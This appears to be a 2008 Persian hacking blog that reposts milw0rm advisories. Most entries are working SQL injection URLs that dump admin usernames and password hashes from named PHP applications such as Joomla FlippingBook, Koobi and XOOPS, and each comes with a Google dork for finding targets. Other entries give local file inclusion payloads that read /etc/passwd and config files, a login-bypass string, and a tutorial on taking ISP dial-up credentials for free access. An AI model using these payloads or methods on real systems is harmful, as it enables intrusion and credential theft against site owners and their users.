|
|
|
|
|
[ A L G E R I A S E C U R I T Y C R E W ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~] Version() : 1.0.4
###########################################
#
# DORK 1 : inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook
[+]Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
[+] : Open the source page to see the 'password'
###########################################
# milw0rm.com [2008-04-22]
| +| نوشته شده توسط
محمد در چهارشنبه چهارم اردیبهشت 1387
| |
| | | |
|
|
|
|
اینم از باگ جدید امروز
##########CANAKKALE GECiLMEZ##############################
Crazy Goomba 1.2.1 SQL inj
dork: :(( sory
author: ZoRLu
home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )
contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )
Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da :((
Not: http://www.z0rlu.ownspace.org acIklarýn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))
###################CANAKKALE GECiLMEZ###################
http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]
[SQL]
1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**
( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )
md5 i kýr ve giris yap
http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion ( login )
sonra admin panele baglan
admin panel:
http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php
###################CANAKKALE GECiLMEZ####################
thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m
avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org
O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) )
Efsane: YILDIRIMORDULARI.ORG
Dersler BasladI Sanal Bitti :(((
###################CANAKKALE GECiLMEZ####################
# milw0rm.com [2008-04-21] | +| نوشته شده توسط
محمد در سه شنبه سوم اردیبهشت 1387
| |
| | | |
|
|
|
|
##########################################
#
# XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÝL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl :"modules/recipe"
#
###########################################
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
###########################################
Submitter: sbruchet
Publisher: Cba
Updated On: 2006/03/06
Version: 2.2
Downloads: 2853
File Size: 162 bytes
Home Page: Not Specified
download link:
http://www.xoops.org/modules/repository/singlefile.php?cid=43&
;lid=1524
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
# milw0rm.com [2008-04-19]
| +| نوشته شده توسط
محمد در دوشنبه دوم اردیبهشت 1387
| |
| | | |
|
|
|
|
 اما اين باگ چيست؟
> اکنون به وسيله يک ماشين حساب يا حتي ماشين حساب خود ويندوز دو عدد 850 و 77.1 را در هم ديگر ضرب کنيد. حاصل طبعأ 65535 خواهد شد.
> اما اکنون اين کار را به وسيله اکسل 2007 ، قوي ترين نرم افزار محاسباتي انجام دهيد! در ميان تعجب حاصل 100,000 خواهد شد! يک عدد رند و کاملأ بي ارتباط!
> فرمول ضرب اين دو عدد در اکسل نيز SUMPRODUCT(850,77.1) 0= ميباشد.
> جالب اينکه علاوه بر اعداد فوق ، اين باگ بر روي اعداد ديگري نيز پابرجاست. بحث کاملي پيرامون اين موضوع در يکي از گروه هاي گوگل مطرح شده که به نتايجي نيز رسيده است .
| +| نوشته شده توسط
محمد در یکشنبه یکم اردیبهشت 1387
| |
| | | |
|
|
|
|
Atter 0.9.1 Local File Inclusion Vulnerability
#################################################
Author : KnocKout
ThanX : CW ALL USERS
=================================================
Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5
Attackz :
http://localsite.com/path/include/functions.inc.php?class=[Local File]
http://localsite.com/path/include/common.inc.php?file=[Local File]
#################################################
# milw0rm.com [2008-04-19]
| +| نوشته شده توسط
محمد در یکشنبه یکم اردیبهشت 1387
| |
| | | |
|
|
|
|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-04-15]
| +| نوشته شده توسط
محمد در پنجشنبه بیست و نهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user
*********************************************
WEBSiTE: http://www.xcorpitx-hack.com/Forum
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-14]
| +| نوشته شده توسط
محمد در چهارشنبه بیست و هشتم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user
*********************************************
WEBSiTE: http://www.xcorpitx-hack.com/Forum
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-14]
| +| نوشته شده توسط
محمد در سه شنبه بیست و هفتم فروردین 1387
| |
| | | |
|
|
|
|
############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
###############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
*********************************************
WEBSiTE>>>http://www.xcorpitx-hack.com/Forum/
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-13]
| +| نوشته شده توسط
محمد در دوشنبه بیست و ششم فروردین 1387
| |
| | | |
|
|
|
|
خوب بریم سر آموزش امروز : - TCP و UDP چيست؟
مدل TCP/IP که برای ارتباط اينترنتی بهکار میرود، میتوان به لايههای مختلفی تقسيمبندی کرد که بعدا بيشتر توضيح میدم، اما يکی از اين لايهها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :
۱- (TCP (Transmission Control Protocol :
اين پروتکل قویتر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب میشود. اين پروتکل توانايی بازبينی بستههاو کنترل خطا را هم دارد.
۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.
نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار میکنيم، اين ارتباط میتواند از نوع TCP يا UDP باشد. بنابراين وقتی میخواهيم يک کامپيوتر خاصی را از نظر پورتها بررسی کنيم، هردو بايد بررسی شود.
- تقسيمبندی پورتها از روی شماره آنها
۱- پورتهای 0 تا 1023 :
مشهورترين پورتها هستند و معمولا هرکدام برای يک سرويس خاص استفاده میشود. با تعدادی از اين پورتها در جلسات قبل آشنا شدهايد.
۲- پورتهای 1024 تا 49151 :
اين سری از پورتها مشخصا با هيچيک از سرويسهای اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار میکنيد، يکی از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتی که میدهد که يکی از پورتهای 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت میشوند. يعنی پورت شما يکی از پورتهای اين قسمت است و پورت سرور يکی از پورتهای بالايی.اين سری پورتها را پورتهای register شده هم میگويند.
۳- پورتهای 49152 تا 65535 :
اين سری از پورتها بهندرت استفاده میشوند. کاربرد اساسی آنها برای يک سری سرويسهای خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورتهای رديف ۲ هم استفاده میکنند و اين تقسيمبندیها هميشه برقرار نيست و بههمين علت است که گاهی پورتها را به دودسته زير 1024 و بالای 1024 تقسيم میکنند.
- تکميل ليست پورتها
در جلسه دوم در مورد مهمترين پورتها صحبت کردم. حالا يک ليست کاملتر را در اين درس میگم. اگر میخواهيد يک مرجع نسبتا کامل برای مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثی در مورد تروجانها نمیکند زيرا تروجانهای شناخته شده هم يک سری پورت پيشفرض دارند که در جای خود بحث خواهد شد.
Ports TCP/UDP Service or Application
------ ------- ----------------------------------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def
- چگونه به يک پورت Telnet کنيم؟
برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورتهايی را که ممکن است اطلاعاتی مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور بهجای hostname شماره ip و يا نام سايت را وارد میکنيد و بهجای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست میدهد در کامپيوتری به اسم www.iums.ac.ir مينويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام میدهد، زيرا بعضی از پورتها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوترهای مختلف و پورتهای گوناگون تلنت کنيد
منبع:http://www.amirihackerr.blogfa.com | +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
برای هک سایت های php عبارت زیر را در google جستجو کنید
عبارتی که باید آنرا جستجو کنید :
powered by Advanced Guestbook 2. + inurl:guestbook/admin.php
يا
inurl:guestbook + inurl:admin.php
و به جای رمز عبارت زیر را وارد کنید
OR ('a' = 'a ('
منبع:http://www.amirihackerr.blogfa.com | +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discoverd by dun \ dun[at]strcpy.eu ]
#####################################################
# [ Ksemail ] Local File Include Vulnerability #
#####################################################
#
# Script site: http://www.ksemail.com/, http://mail.ksemail.com
#
# Vuln:
# http://site.com/prog/index.php?language=../../../../../../etc/passwd
# http://site.com/prog/index.php?lang=../../../../../../etc/passwd
#
# Dork example: "FoxMail/Outook"
#
###############################################
# Greetz: D3m0n_DE, nejman, sid_psycho
# and all otherz.. [;
###############################################
[ dun / 2008 ]
********************************************************************************************
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| |
| | | |
|
|
|
|
هک کارت اینترنت با یه روش دیگه (دفعه ی قبل هک کارت اینترنت رو با یه برنامه بهتون یاد دادم ولی این با خود ویندوزه) نظر یادتون نره
هک آی اس پی(کارت اینترنت)
می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.
این برنامه ی جالب هایپرترمینال HyperTerminal هستش.این برنامه رو از آدرس زیر میتونید پیدا کنید.
Start Menu\All Programs\Accessories\Communications\HyperTerminal
در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.اگه آموزش هایپر ترمینال هم خواستید تو نظرات بگید تا هر چه زودتر براتون بزارم تو وبلاگ.چون کارای جالبی با این برنامه میشه انجام داد.
حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.
حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.
Welcome To ROUTER
Username :
PassWord :
شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:
Router  _
حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP فعلا چیزی نمیگم ولی اگه خواستین تو نظرات بگید تا براتون آموزش رو براتون بزارم)
در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :
Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.
Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.
Help نمایش کلیهء فرمانهای مجاز.
نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.
حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟
منبع:http://download2.ir
| +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
ما در اینجا یک سرور رو که یه سری سایت رو نگه داری می کنه هک می کنیم یعنی IIS اون نصب باشه
1- اشنايي با شبكه كه خب همينطور كه اكثر شما ميدونين از دونستن اطلاعات مقدماتي در مورد TCP/IP و لايه هاي مختلفش شروع ميشه كه هميشه پيشنهاد شده براي درك بهتر اين مبحث اول به بررسي 7 لايه مرجع OSI يا همون open system Interconnection بپردازيم بعد بريم سراغ 4 لايه TCP/IP بعد از اشنايي با لايه ها ما بايد با مفهوم IP يا همون Internet protocol اشنا بشيم يعني بدونيم ساختار يك IP چيه و بسته هاي IP چي هستند و چه جوري ميتونيم بفهميم كه يك IP ماله چه كلاسي هست (A,b,..) بعد با مفهوم پورت ها و اينكه هر پورت وظيفش چيه و ........ و مسلما هر چي بيشتر بدونيم در مورد شبكه مارو در نفوذ كمك ميكنه
2- بعد ما اصلا ميخوايم چيكار كنيم ايا هدفمون از كار انداختن يك سرويس دهنده هست كه باز بحث DOS يا Denial Of Service پيش مياد يا اينكه نفوذ از يك اسيب پذيري خاص مثلا يك سريز شدن بافر كه بحث اسيب شناسي پيش مياد
3 - اصلا چه جوري ما اين اسيب پذيري ها رو پيدا كنيم؟ ما بايد بشنيم با يك vul scanner سرويس دهنده مورد نظر رو تست كنيم مثل Nessus يا برنامه هاي ديگه گيريم اسيب پذيري رو پيدا كرديم حالا مسئله اينه كه چه جوري بايد استفاده كنيم از اين حفره
نكته : يه چيزي كه اصلا بهش توجه نميشه و همه دنبال محيط هاي گرافيكي و زدن يكي دوتا كليد ساده هستن اشنايي با Command Prompt هست مثلا وقتي يك نفر نتونه حتي از طريق داس ليست فايل ها و فولدر هاي يك درايو رو ببينه چه جوري ميخواد با netcat كار كنه!؟ پس ياد گيري داس هم يكي از فاكتورهاي مهم هست
4 - حالا ما ممكن بخوايم يك Backdoor نصب كنيم ؟ بايد بدونيم كه چه چيزي لازم داريم ميتونه netcat باشه كه نقش يك درب پشتي رو ايفا كنه يا BO2K و......
5 - ممكن مثلا سايت هدف از ديتابيس SQL استفاده كنه كه باز ما بايد با دستورات SQL تا حدي اشنا باشيم و بدونيم چه جوري عمل SQL INJECTION رو انجام بديم حداقل بونيم QUERY چيه!
6 - از همه مهمتر شما بايد با يك زبان برنامه نويسي مثل C اشنا باشيد يا حداقل اصول برنامه نويسي رو بدونيد چون همش نميشه از ابزارهاي اماده استفاده كرد
بيبن بحث در اين باره خيلي مفصله اگه ميبيني يه سري از سايت ها مثل اب خوردن هك ميشن مثلا سايت هايي كه از نواك استفاده ميكنن به نظر من نه اين كار هك كردن اسمشه نه اون بنده خدايي كه اين كار و كرده هكر! چون يه عده ادم باهوش و حرفه اي ميان مشكلات اين برنامه ها رو پيدا ميكنن و نه تنها براي تخريب بلكه براي بهبود امنيت در اختيار ديگران قرار ميدن و يه سري هم هستن كه هر روز سايت هايي مثل Security focus رو چك ميكنند به محضي كه يك كد اماده پيدا كردن شروع ميكنن مثلا هك كردن سايت هاي ديگران كه خب اگه اينكارشون بدون خرابكاري و پاك كردن اطلاعات باشه باز خوبه اونوقت مدير سايت ميره مشكلات رو برطرف ميكنه نه اينكه ور داره هر چي اطلاعات داره سايت پاك كنه!
چون ميدونم خيلي ها دنبال اين مباحث هستن من مسئوليت اموزش كامل شبكه رو بر عهده ميگرم و طي حدود 15 مقاله سعي ميكنم تمام موضوعات مورد نظر رو بگم ايشالا از اساتيد گروه يكيشون همت ميكنه و اموزش هك و امنيت رو ميده من توضيحات بالا رو نگفتم براي اينكه تو دل شما رو خالي كنم ولي اين يك حقيقت كه شما بايد راه درازي رو براي اين كار طي كنيد و هر روز به دنبال ياد گيري مسئله جديدي باشيد ميتونيد براي شروع از مقالاتي كه در مورد شبكه خواهم نوشت اغاز كنيد در كنارش يك زبان برنامه نويسي رو براي شروع بياموزيد خدارو شكر تو گروه دوستاني هستن كه به سوالات شما در زمينه برنامه نويسي پاسخ بدن اگرم كسي جواب نده باز ما مهدي رو داريم و مطمئنم از تجربياتش ميتونيد استفاده كنيد و سوالاتتونو بپرسين اصلا ما اين گروه رو از روز اول براي رفع مشكلات شما راه انداختيم تا اينجا كه اومديم ايشالا تا اخرشم هستيم به شرط اينكه بچه ها هم هواي مارو داشته باشن و كمكون كنن و مارو دست تنها نزارن و واقعا وضيعت كاري ما رو هم درك كنن خيليا بودن كه رفيق نيمه راه بودن واسه گروه يه جورايي اولش داغ بودن و بعد مارو ول كردن و شايد الان چند ماه هم بشه كه سري به سايت نزنن ولي نميخوام بگم هر چي دارن از مشهدتيم دارن ولي خودشون ميدونن و خداي بالا سرشون كه روزي كه تو گروه اومدن حتي كوچكترين مسئله رو هم بلد نبودن تمام بچه ها اطلاعاتشون در اختيار هم گذاشتن و مطمئنم و به اين موضوع ايمان دارم كه هيچ توقعي هم ندارن فقط تنها چيزي كه يك گروه از اعضاش ميخواد اينه كه فعاليتش مستمر باشه اونم در حد توانش حالا يه سري استثنا هم هستن كه واقعا مشكل براشون پيش اومد و نتونستن كار كنن باز دم بچه هايي كه از اول با ما بودن گرم و اين دوستاني كه جديد اضافه شدن به گروه خداشكر كه حداقل شما هيچ وقت پشت مشهدتيم رو خالي نميكنيد حتي اگه مطلب اموزشي نمينويسند ولي باز با گروه همراه هستن و سري به سايت ميزنن- به اميد موفقيت بيش از پيش براي مشهدتيم
منبع:http://www.mashhadteam.com | +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : gallery-script-lite
# Bug : Remote Local File Inclusion Vulnerability
# Download : http://www.arwscripts.com/gallery-script-lite.html
# Dork : developed by ARWScripts.com
# file : download.html
# Error :
=========================JIkI Team===================
# Exploit :
http://[site]/[script]/download.html?path=
#ex :
download.html?path=config.inc.php
http://www.[site].com/demos/galleryscriptlite/download.html?path=config.inc.php
===========
greetz : all my friend and H-T Team and all No-back members and tryag.Com
visit: www.no-back.org & www.tryag.com
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------
# milw0rm.com [2008-04-09]
| +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
اینم از آموزش کرک برنامه به صورت pdf
برای دانلود به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi v4.4,V5.4 gallery (img_id)
#
ONLY 4.4 AND 5.4
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"
###########################################
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
admin login=admin/login.php
password under page
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-08]
| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
##############################################################################
# ChartDirector Ver 4.1 (viewsource.php) Remote File Disclosure Vulnerability
#
# D Script : http://www.advsofteng.com/download.html
#
#
# By : Stack-Terrorist [v40]
#
# POC : http://site.com/chartdirector/phpdemo/viewsource.php?file=viewsource.php
#
#
##############################################################################
# Greetz : Tryag-Team -JIKI Team GoLd_M [Mahmod_Ali] -H-T Team -RoMaNcYxHaCkEr -Str0ke
##############################################################################
# milw0rm.com [2008-04-07]
| +| نوشته شده توسط
محمد در سه شنبه بیستم فروردین 1387
| |
| | | |
|
|
|
|
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko [jiki team]
# email : jalikom@hotmail.com
